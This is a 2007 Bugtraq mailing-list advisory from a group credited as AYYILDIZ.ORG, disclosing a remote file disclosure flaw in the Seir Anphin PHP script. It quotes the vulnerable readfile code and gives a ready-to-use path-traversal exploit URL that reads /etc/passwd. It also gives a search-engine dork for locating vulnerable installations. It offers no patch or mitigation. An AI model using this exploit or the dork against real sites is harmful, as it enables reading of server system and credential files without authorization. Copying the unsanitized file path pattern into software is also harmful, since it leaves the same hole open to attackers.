[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070428130159.23350.qmail@securityfocus.com>
Date: 28 Apr 2007 13:01:59 -0000
From: ilkerkandemir@...et.com
To: bugtraq@...urityfocus.com
Subject: Seir Anphin (file.php a[filepath]) Remote File Disclosure
Vulnerability
----------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
info: */Siz Yokken AYYILDIZ Vardi.*/
-----------------------------------------------------------------------------------
Bug:
exit();
header("Content-Disposition: attachment; filename=\"$filename\"");
header('Content-Length: ' . filesize($a['filepath']));
readfile($a['filepath']);
exit();
-----------------------------------------------------------------------------------
Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd
-----------------------------------------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG
Powered by blists - more mailing lists